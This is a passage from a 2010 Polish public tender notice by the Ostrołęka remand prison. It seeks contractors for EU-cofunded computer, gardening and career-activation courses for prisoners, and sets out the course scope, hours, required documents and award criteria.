 (skrypt podręcznik, notatnik, długopis) i jeden dodatkowy komplet przekaże zamawiającemu;
Wykonawca zobowiąże się do umieszczenia informacji o współfinansowaniu przez 
Unię Europejską w ramach Europejskiego Funduszu Społecznego wraz odpowiednimi
logotypami na wszystkich dokumentach w ramach zajęć aktywizacyjnych oraz materiałach
dydaktycznych, zgodnie z Załącznikiem nr 1 do Planu Komunikacji POKL (Wytyczne dotyczące
oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki znajduję się na 
stronie internetowej Centrum Rozwoju Zasobów Ludzkich -www.crzl.gov.pl);
Wykonawca zapewni przeprowadzenie zajęć aktywizacyjnych przez doradcę zawodowego;
Wykonawcy zostanie wypłacona należność na rachunek bankowy na podstawie prawidłowo
wystawionej faktury VAT (rachunku) oraz po przekazaniu dokumentacji z zajęć oraz protokołu
odbioru wykonania przedmiotu zamówienia;
Wykonawca zobowiązany będzie o przechowywania dokumentacji z zrealizowanych zajęć
do końca 2020 r.;
Wykonawca zobowiązany będzie do umożliwienia uprawnionym instytucjom zewnętrznym 
kontroli zajęć aktywizacyjnych współfinansowanych przez Unię Europejską w ramach
Europejskiego Funduszu Społecznego w zakresie i na zasadach wynikających z obowiązujących
przepisów.

Założenia organizacyjne

zajęć aktywizacji zawodowej (zadania 1B i 2B)
dla osób odbywających karę pozbawienia wolności

Celem Zajęć aktywizacji zawodowej jest zdobycie wiedzy i praktycznych umiejętności w zakresie poruszania się po rynku pracy po zakończeniu odbywania kary pozbawienia wolności. 
1.Liczebność grupy: 
Aktywizacja zawodowa dla uczestników kursu Komputerowego Gospodarka magazynowa z fakturowaniem - planowana grupa 12 osób,
Aktywizacja zawodowa dla uczestników Kursu Ogrodnik - zagospodarowanie terenów zielonych - planowana grupa 14 osób.
2.Realizacja: 
Planowany termin - zajęcia aktywizacji zawodowej odbywać się będą przed rozpoczęciem każdego z kursów;
Dokładny termin realizacji zajęć aktywizacyjnych oraz harmonogram prowadzenia zajęć zostanie uzgodniony z wykonawcą.
3.       Miejsce realizacji: 
Oddział Zewnętrzny Aresztu Śledczego w Ostrołęce ( Zamawiający zastrzega sobie prawo zmiany miejsca przeprowadzenia kursu - Wykonawcy z tego tytułu nie przysługują jakiekolwiek roszczenia, zwłaszcza do podniesienia ceny); 
Zamawiający zapewnia pomieszczenie w zakresie przeprowadzenia zajęć aktywizacji zawodowej oraz salę wyposażoną w 11 stanowisk komputerowych, rzutnik multimedialny, drukarkę, kopiarkę, współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
4.	Liczba godzin zajęć aktywizacyjnych dla każdej grupy:
Aktywizacja zawodowa dla uczestników kursu Komputerowego Gospodarka magazynowa z fakturowaniem - 18 godz. (zajęcia indywidualne 12 godz. i zajęcia grupowe 6 godz.);
Aktywizacja zawodowa dla uczestników Kursu Ogrodnik - zagospodarowanie terenów zielonych - 20 godz. (zajęcia indywidualne 14 godz. i zajęcia grupowe 6 godz.);
Zajęcia odbywać się będą od poniedziałku do piątku, od godz. 9.00 do 16.00, z przerwą obiadową od 12.30 do 13.30.
5.	Zakres zajęć aktywizacyjnych powinien obejmować m.in.:
a)Zajęcia indywidualne:
Dokonanie analizy potrzeb - określenie trudności zawodowych; 
Ocena samego siebie - indywidualna ocena zawodowa, sprecyzowanie celów zawodowych, samoocena skazanego jako pracownika; 
Określenie stopnia motywacji - określenie gotowości osadzonego do podjęcia pracy.
b)Zajęcia grupowe:
Rynek pracy:
sytuacja na rynku pracy i jej rozwój;
oczekiwanie pracodawców;
ocena przydatności i radzenia sobie na rynku pracy;
trafność wyboru zawodu;
właściwe przygotowanie się do rozmowy kwalifikacyjnej;
metody poszukiwania pracy i analizowanie ofert pracy.
c)Stworzenie indywidualnego planu działania.  
6.	Zajęcia aktywizacyjne zakończą się wydaniem przez Wykonawcę zaświadczeń uczestnictwa w zajęciach.
7.	Metodyka nauczania:
Zajęcia grupowe metodą seminaryjną z wykorzystaniem środków informatycznych;
Zajęcia indywidualne metodą pracy doradcy zawodowego z uczestnikiem.
Kod Cpv - 80500000-9

Zamawiający dopuszcza możliwości składania ofert częściowych, odrębnie na każde zadanie 1A, 1B, 2A i 2B. 

Terminy realizacji poszczególnych kursów, jak również ilość uczestników mogą ulec zmianie z przyczyn niezależnych od Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.32.00-1, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy - załącznik do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy - załącznik do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy - załącznik do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy - załącznik do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy - załącznik do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zaświadczenie o wpisie do rejestru instytucji szkoleniowych
1.Formularz ofertowy - załącznik nr 1.
2.Formularze cenowe w zakresie wybranych przez wykonawcę zadań - załączniki nr 2 i 3.
3.Wzory umów - załącznik nr 4.   
4.Oświadczenie o spełnianiu warunków udziału w postępowaniu - załącznik nr 5.
5.Oświadczenie Wykonawcy o wyrażeniu zgody na przetwarzanie danych osobowych - załącznik nr 6.
6.Oświadczenie Wykonawcy o zachowaniu w tajemnicy danych osobowych do których uzyskał dostęp - załącznik nr 7.
7.Oświadczenie o spełnianiu warunków określonych w Rozporządzeniu Ministra Edukacji i Nauki - załącznik nr 8.
8.Oświadczenie o zapoznaniu się z Rozporządzeniem Ministra Sprawiedliwości w sprawie zasad i trybu prowadzenia nauki w zakładach karnych - załącznik nr 9.,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana stawki podatku Vat, lub inne, których nie można było przewidzieć</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy w Ostrołęce
07-410 Ostrołęka
ul. Traugutta 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2010 godzina 09:00, miejsce: Areszt Śledczy w Ostrołęce
07-410 Ostrołęka
ul. Traugutta 19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Cykl szkoleniowo-aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności, współfinansowany z środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie kursu komputerowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs komputerowy Gospodarka magazynowa z fakturowaniem

Miejsce realizacji: teren zamawiającego - Oddział Zewnętrzny Aresztu Śledczego w Ostrołęce,
Przytuły Stare 13 A, 07-411 Rzekuń;
Termin realizacji: zakończenie realizacji przedmiotu zamówienia do 12.06.2010 r.;
Liczebność grupy: 12 osób;
Liczba godzin szkoleniowych: 120 godz. lekcyjnych 
Wykonawca przed rozpoczęciem zajęć przeprowadzi badania lekarskie uczestników kursu na 
koszt własny i przedstawi Zamawiającemu stosowne zaświadczenia (12 osób+ 2 osoby z listy
rezerwowej) informujące o dopuszczeniu do kursu każdego uczestnika;
Wykonawca ubezpieczy uczestników (12 osób + 2 osoby z listy rezerwowej) od następstw
nieszczęśliwych wypadków na czas trwania kursu w niezbędnym; 
Wykonawca powinien spełniać warunki określone w § 1 ust. 2 Rozporządzenia Ministra Edukacji 
i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania uzupełniania przez osoby dorosłe wiedzy
ogólnej, umiejętności i kwalifikacji i zawodowych w formach pozaszkolnych - wymagane 
oświadczenie;
Wykonawca winien być wpisany do rejestru instytucji szkoleniowych  - wymagane 
zaświadczenie;
Wykonawca zobowiązany będzie zapoznać się i  przeprowadzić kurs zgodnie 
z Rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie 
szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych - wymagane
oświadczenie;
Wykonawca zobowiązany będzie do wyrażenia zgody na przetwarzanie danych 
osobowych dla potrzeb niezbędnych do realizacji, sprawozdawczości i kontroli
projektu - zgodnie z Ustawą o ochronie danych osobowych - wymagane oświadczenie;
Wykonawca zobowiązany będzie zachować w tajemnicy i nie ujawniać danych osobowych,
do których Wykonawca uzyskał dostęp w związku z uczestnictwem w projekcie - wymagane
oświadczenie;
Wykonawca załączy do swojej oferty program kursu, który powinien być zgodny  z wymaganiami
określonymi w przepisie § 32 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 2 marca 
2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia
usług rynku pracy (Dz. U. Nr 47, poz. 315) oraz wzór zaświadczenia o ukończeniu kursu.
Zamawiający i Wykonawca przed rozpoczęciem kursu ustalą harmonogram określający dni
i godziny prowadzenia zajęć;
Wykonawca zobowiązany będzie do przygotowania i prowadzenia dokumentacji kursu,
która powinna być zgodna z wymaganiami określonymi w przepisie § 32 Rozporządzenia 
Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków
prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 47, poz. 315);
Wykonawca każdemu uczestnikowi przekaże komplet materiałów szkoleniowych 
(skrypt podręcznik, notatnik, długopis) i jeden dodatkowy komplet zamawiającemu. 
Zamawiający zapewni pomieszczenie wyposażone w 11 stanowisk komputerowych, rzutnik 
multimedialny, drukarkę, kopiarkę - sprzęt zakupiony w ramach projektu współfinansowanego
ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego;
Wykonawca zobowiązany będzie zapewnić jedno stanowisko komputerowe laptop 
dla dwunastego uczestnika oraz odpowiedni program komputerowy dla uczestników 
z zakresu tematyki kursu komputerowego;
Wykonawca zobowiąże się do umieszczenia informacji o współfinansowaniu ze środków
Unii Europejskiej w ramach Europejskiego Funduszu Społecznego wraz odpowiednimi 
logotypami na wszystkich dokumentach w ramach kursu oraz materiałach szkoleniowych,
zgodnie z Załącznikiem nr 1 do Planu Komunikacji POKL (Wytyczne dotyczące oznakowania
projektów w ramach Programu Operacyjnego Kapitał Ludzki znajduję się na stronie internetowej
Centrum Rozwoju Zasobów Ludzkich -www.crzl.gov.pl);
Wykonawca zobowiązany będzie przeprowadzić egzamin i wydać zaświadczenia uczestnikom
wg wzorów wynikających z Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego  2006 r.
w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i 
kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216);
Wydane absolwentom dokumenty ukończenia kursu winny zawierać informację o realizowaniu 
kursu w ramach projektu współfinansowanego ze środków Unii Europejskiej w ramach
Europejskiego Funduszu Społecznego; 
Wykonawca zapewni wykładowców/instruktorów posiadających kwalifikacje do przeprowadzenia
kursu;
Wykonawcy zostanie wypłacona należność na rachunek bankowy na podstawie prawidłowo 
wystawionej faktury VAT (rachunku) oraz po przekazaniu dokumentacji kursowej  oraz protokołu
odbioru wykonania przedmiotu zamówienia;
Wykonawca zobowiązany będzie do przechowywania dokumentacji szkoleniowej 
do końca 2020 r.;
Wykonawca zobowiązany będzie do umożliwienia uprawnionym instytucjom zewnętrznym 
kontroli kursu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego
Funduszu Społecznego w zakresie i na zasadach wynikających z obowiązujących przepisów.


  Założenia organizacyjne

kursu Komputerowego 
Gospodarka magazynowa z fakturowaniem 
dla osób odbywających karę pozbawienia wolnośći

Celem kursu jest teoretyczne i praktyczne przygotowanie osób pozbawionych wolności do pracy w zawodzie zgodnym z tematyką kursu oraz nabycie umiejętności zawodowych.
1)Liczebność grupy: 12 osób.
2)Realizacja: 
zakończenie realizacji przedmiotu zamówienia do 12.06.2010 r.; 
1.Dokładny termin realizacji kursu oraz harmonogram prowadzenia zajęć zostanie uzgodniony z Wykonawcą.
3)Miejsce realizacji: 
Oddział Zewnętrzny Aresztu Śledczego w Ostrołęce w Przytułach Starych ( Zamawiający zastrzega sobie prawo zmiany miejsca przeprowadzenia kursu - Wykonawcy z tego tytułu nie przysługują jakiekolwiek roszczenia, zwłaszcza do podniesienia ceny) ;
Zamawiający zapewnia w zakresie przeprowadzenia zajęć w ramach kursu pomieszczenie wyposażone w 11 stanowisk komputerowych, które znajduje się na terenie zamawiającego oraz zapewnia korzystanie ze sprzętu zakupionego w ramach projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (rzutnik multimedialny, drukarka, kopiarka);
Wykonawca zapewni jedno stanowisko komputerowe/laptop dla dwunastego uczestnika kursu oraz program komputerowy dla wszystkich uczestników z zakresu tematyki kursu komputerowego.
4)Liczba godzin szkoleniowych: 
120 godzin lekcyjnych, po 8 godzin dziennie;
Zajęcia odbywać się będą od poniedziałku do piątku, od godz. 9.00 do 16.00, z przerwą obiadową od 12.30 do 13.30.
5)Zakres kursu powinien obejmować zagadnienia m.in.:
a)Bezpieczeństwo i higiena pracy;
b)Gospodarka magazynowa;
c)Podstawy obsługi komputera;
d)Obsługa komputera w zakresie zastosowania programu komputerowego w gospodarce magazynowej;
e)Zasady wystawiania faktur. 
6)Kurs zakończy się egzaminem przeprowadzonym przez Wykonawcę oraz wydaniem zaświadczeń uczestnictwa.
7)Metodyka nauczania:
Wykład metodą seminaryjną z zastosowaniem środków informatycznych, 
Zajęcia praktyczne metodą ćwiczeń z zastosowaniem środków informatycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.32.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs Ogrodnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Ogrodnik - zagospodarowanie terenów zielonych
Miejsce realizacji: teren zamawiającego - Oddział Zewnętrzny Aresztu Śledczego w Ostrołęce,
Przytuły Stare 13 A, 07-411 Rzekuń;
Termin realizacji - zakończenie realizacji przedmiotu zamówienia do 12.06.2010 r.
Liczebność grupy: 14 osób;
Liczba godzin szkoleniowych: 120 godz. lekcyjnych (w tym zajęcia teoretyczne i praktyczne);
Wykonawca przed rozpoczęciem zajęć przeprowadzi badania lekarskie uczestników 
kursu na koszt własny i przedstawi Zamawiającemu stosowne zaświadczenia (14 osób + 2 
osoby z listy rezerwowej) informujące o dopuszczeniu do kursu każdego uczestnika;
Wykonawca ubezpieczy uczestników (14 osób + 2 osoby z listy rezerwowej) od następstw 
nieszczęśliwych wypadków na czas trwania kursu w niezbędnym zakresie przed rozpoczęciem
zajęć;  
Wykonawca powinien spełniać warunki określone w § 1 ust. 2 Rozporządzenia Ministra Edukacji
i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe
wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych - wymagane 
oświadczenie;
Wykonawca winien być wpisany do rejestru instytucji szkoleniowych  - wymagane 
zaświadczenie;
Wykonawca zobowiązany będzie zapoznać się i  przeprowadzić kurs zgodnie 
z Rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie szczegółowych 
zasad i trybu prowadzenia nauczania w zakładach karnych;
Wykonawca zobowiązany będzie do wyrażenia zgody na przetwarzanie danych osobowych
dla potrzeb niezbędnych do realizacji, sprawozdawczości i kontroli projektu - zgodnie z Ustawą
o ochronie danych osobowych - wymagane oświadczenie;
Wykonawca zobowiązany będzie zachować w tajemnicy i nie ujawniać danych osobowych,
do których Wykonawca uzyskał dostęp w związku z uczestnictwem w projekcie - wymagane 
oświadczenie;
Wykonawca załączy do swojej oferty program kursu, który powinien być zgodny z wymaganiami
określonymi w przepisie § 32 rozporządzenia Ministra Pracy i Polityki Społecznej
z dnia 2 marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne
służby zatrudnienia usług rynku pracy (Dz. U. Nr 47, poz. 315) oraz wzór zaświadczenia 
o ukończeniu kursu;
Wykonawca zobowiązany będzie do przygotowania i prowadzenia dokumentacji kursu,
która powinna być zgodna z wymaganiami określonymi w przepisie § 32 Rozporządzenia
Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007 r. w sprawie szczegółowych warunków
prowadzenia przez publiczne służby zatrudnienia usług rynku pracy;
Wykonawca wyposaży uczestników kursu w odzież ochronna i środki ochrony indywidualnej
na zajęcia praktyczne;
Zamawiający i Wykonawca przed rozpoczęciem kursu ustalą harmonogram określający dni
i godziny prowadzenia zajęć;
Wykonawca każdemu uczestnikowi przekaże komplet materiałów szkoleniowych 
(skrypt/podręcznik, notatnik, długopis) i jeden dodatkowy komplet przekaże zamawiającemu;
Zamawiający zapewni pomieszczenie do przeprowadzenia kursu oraz sprzęt 
(szpadel - szt. 4 szt., kultywator - szt. 4 szt., grabie do liści - 4 szt., grabie ogrodowe - 4 szt.,
taczka ogrodowa 3 szt., wąż ogrodowy 50 m - 1 szt., zraszacz oscylacyjny - 1 szt., kosiarka
spalinowa - 1 szt., wyka szarka spalinowa - 1 szt.) zakupiony w ramach projektu
współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu 
Społecznego;
Wykonawca zobowiązany będzie zapewnić materiały niezbędne do prawidłowego 
przeprowadzenia zajęć praktycznych w wysokości nie mniejszej niż 30% i nie większej 40%
kosztu ogólnego usługi szkoleniowej;
Wykonawca zobowiąże się do umieszczenia informacji o współfinansowaniu przez 
Unię Europejską w ramach Europejskiego Funduszu Społecznego wraz odpowiednimi
logotypami na wszystkich dokumentach w ramach kursu oraz materiałach szkoleniowych,
zgodnie z Załącznikiem nr 1 do Planu Komunikacji POKL (Wytyczne dotyczące oznakowania
projektów w ramach Programu Operacyjnego Kapitał Ludzki znajduję się na stronie internetowej
Centrum Rozwoju Zasobów Ludzkich - www.crzl.gov.pl);
Wykonawca zobowiązany będzie przeprowadzić egzamin i wydać zaświadczenia uczestnikom
wg wzorów wynikających z Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego  2006 r.
w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności 
i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216);
Wydane absolwentom dokumenty ukończenia kursu winny zawierać informację
o realizowaniu szkolenia w ramach projektu współfinansowanego ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego;
Wykonawca zapewni wykładowców/instruktorów posiadających kwalifikacje do przeprowadzenia
zajęć teoretycznych i praktycznych kursu;
Wykonawcy zostanie wypłacona należność na rachunek bankowy na podstawie prawidłowo
wystawionej faktury VAT (rachunku) oraz po przekazaniu dokumentacji kursowej  oraz protokołu
odbioru wykonania przedmiotu zamówienia;
Wykonawca zobowiązany będzie o przechowywania dokumentacji szkoleniowej 
do końca 2020 r.;
Wykonawca zobowiązany będzie do umożliwienia uprawnionym instytucjom zewnętrznym 
kontroli kursu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu
Społecznego w zakresie i na zasadach wynikających z obowiązujących przepisów.


Założenia organizacyjne

kursu Ogrodnik - zagospodarowanie terenów zielonych 
dla osób odbywających karę pozbawienia wolności

Celem kursu jest teoretyczne i praktyczne przygotowanie osób pozbawionych wolności do pracy w zawodzie zgodnym z tematyką kursu oraz nabycie umiejętności zawodowych.
1)Liczebność grupy: 14 osób
2)Realizacja: 
zakończenie realizacji przedmiotu zamówienia do 12.06.2010 r. 
1.Dokładny termin realizacji kursu oraz harmonogram prowadzenia zajęć zostanie uzgodniony z Wykonawcą,
3)Miejsce realizacji: 
Oddział Zewnętrzny Aresztu Śledczego w Ostrołęce w Przytułach Starych ( Zamawiający zastrzega sobie prawo zmiany miejsca przeprowadzenia kursu - Wykonawcy z tego tytułu nie przysługują jakiekolwiek roszczenia, zwłaszcza do podniesienia ceny) ;
Zamawiający zapewnia miejsce do przeprowadzenia zajęć teoretycznych i praktycznych kursu.
4)Liczba godzin szkoleniowych: 
120 godzin lekcyjnych (w tym zajęcia teoretyczne praktyczne), po 8 godzin dziennie;
Zajęcia odbywać się będą od poniedziałku do piątku, od godz. 9.00 do 16.00, z przerwą obiadową od 12.30 do 13.30.
5)Zakres kursu powinien obejmować zagadnienia m.in.:
a)Przepisy BHP i ppoż. i ochrony środowiska, odzież ochronna, sprzęt ochrony osobistej,
b)Informacje z zakresu ogrodnictwa terenów zieleni:
Planowanie i wymiarowanie,
Projektowanie terenów zielonych,
Ochrona i pielęgnacja roślin,
Zasady rozmieszczania poszczególnych gatunków roślin, odmiana roślin,
Standardy odległości sadzenia roślin;
c)Przygotowanie terenu i gleby pod sadzenie i uprawę roślin; 
d)Sadzenie roślin, krzewów  i drzew;
e)Pielęgnacja rabat i kwietników;
f)Renowacja i pielęgnacja trawników;
g)Pielęgnacja drzew:
Rodzaje cięć;
Usuwanie odrostów;
h)Pielęgnacja krzewów;
i)Prace porządkowe.
6)Zamawiający zapewnia możliwość korzystania z sprzętu zakupionego w ramach projektu na zajęciach praktycznych (szpadel - szt. 4 szt., kultywator - szt. 4 szt., grabie do liści - 4 szt., grabie ogrodowe - 4 szt., taczka ogrodowa 3 szt., wąż ogrodowy 50 m - 1 szt., zraszacz oscylacyjny - 1 szt., kosiarka spalinowa - 1 szt., wyka szarka spalinowa - 1 szt.).
7)Wykonawca zapewni pozostały sprzęt i materiały dydaktyczne do zajęć praktycznych, które będą niezbędne do przeprowadzenia zajęć praktycznych.  
8)Kurs zakończy się egzaminem przeprowadzonym przez Wykonawcę oraz wydaniem zaświadczeń uczestnictwa.
9)Metodyka nauczania:
Wykład metodą seminaryjną z zastosowaniem środków informatycznych, 
Zajęcia praktyczne metodą wykonywania prac objętych kursem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeprowadzenie aktywizacji dla uczestników kursu komputerowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia aktywizacyjne 
dla uczestników Kursu komputerowego Gospodarka magazynowa z fakturowaniem

Miejsce realizacji: teren zamawiającego - Oddział Zewnętrzny Aresztu Śledczego w Ostrołęce,
Przytuły Stare 13 A, 07-411 Rzekuń;
Planowany termin realizacji: przed rozpoczęciem Kursu komputerowego Gospodarka 
magazynowa z fakturowaniem 
Liczebność grupy: uczestnicy Kursu komputerowego Gospodarka magazynowa 
z fakturowaniem;
Liczba godzin: łącznie 18 godz. lekcyjnych zajęć indywidualnych (12 godz.) 
i grupowych (6 godz.);
Wykonawca powinien spełniać warunki określone w § 1 ust. 2 Rozporządzenia Ministra Edukacji
i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy
ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych - wymagane 
oświadczenie;
Wykonawca winien być wpisany do rejestru instytucji szkoleniowych  - wymagane 
zaświadczenie;
Wykonawca zobowiązany będzie zapoznać się i  przeprowadzić zajęcia zgodnie 
z Rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie 
szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych - wymagane
oświadczenie;
Wykonawca zobowiązany będzie do wyrażenia zgody na przetwarzanie danych osobowych
